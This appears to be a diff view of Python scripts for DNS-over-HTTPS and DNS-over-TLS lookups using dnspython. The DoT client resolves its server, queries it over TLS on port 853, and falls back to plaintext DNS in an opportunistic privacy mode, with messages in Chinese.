parser.add_argument('-doh', '--doh', default='dns.alidns.com')
parser.add_argument('-mode', '--mode', default='opportunistic')
parser.add_argument('-name', '--name', default='www.baidu.com')
parser.add_argument('-type', '--type', default='A')
args = parser.parse_args()
print(f'DoH server: {args.doh}')
try:
if ipaddress.ip_address(args.doh):
p2(args.doh, args.mode, args.name, args.type)
except:
p1(args.doh,args.mode,args.name,args.type)

View File

@@ -0,0 +1,68 @@
import socket
import ssl
import dns.message
import dns.query
import dns.rcode
import argparse
import ipaddress
def do53_query(name,type):
query = dns.message.make_query(qname=name, rdtype=type)
response_message = dns.query.udp(q=query, port=53, where='127.0.0.54', timeout=5)
print(f'本地do53解析域名{name}{type}记录:\n{response_message}')
def p1(dot,mode,name,type):
print(f'========Phase 1: 解析获取DoT服务器的IP地址========')
query = dns.message.make_query(qname=dot, rdtype='A')
for i in range(1,4):
try:
response_message = dns.query.udp(q=query, port=53, where='127.0.0.54', timeout=5)
except:
response_message = ''
print(f'获取失败,重试{i}')
if response_message != '':
print(f'{dot} A 记录地址为 {response_message.answer[0]}')
p2(str(response_message.answer[0]).split(' ')[-1],args.mode,args.name,args.type)
else:
if mode == 'opportunistic':
print('机会隐私设置,降为明文进行查询')
do53_query(name, type)
else:
print('严格隐私设置,查询结束')
def p2(dot_ip,mode,name,type):
print(f'========Phase 2: 与DoT服务器{dot_ip}建立连接========')
query = dns.message.make_query(qname=name, rdtype=type)
for i in range(1,4):
try:
response_message = dns.query.tls(q=query, port=853, where=dot_ip, timeout=5,verify=True)
except:
response_message = ''
print(f'获取失败,重试{i}')
if response_message == '':
if mode == 'opportunistic':
print('机会隐私设置,降为明文进行查询')
do53_query(name, type)
else:
print('严格隐私设置,查询结束')
else:
print(f'解析域名{name}{type}记录:\n{response_message}')
parser = argparse.ArgumentParser()
parser.add_argument('-dot', '--dot', default='dns.alidns.com')
parser.add_argument('-mode', '--mode', default='opportunistic')
parser.add_argument('-name', '--name', default='www.baidu.com')
parser.add_argument('-type', '--type', default='A')
args = parser.parse_args()
print(f'DoT server: {args.dot}')
try:
if ipaddress.ip_address(args.dot):
p2(args.dot, args.mode, args.name, args.type)
except:
p1(args.dot,args.mode,args.name,args.type)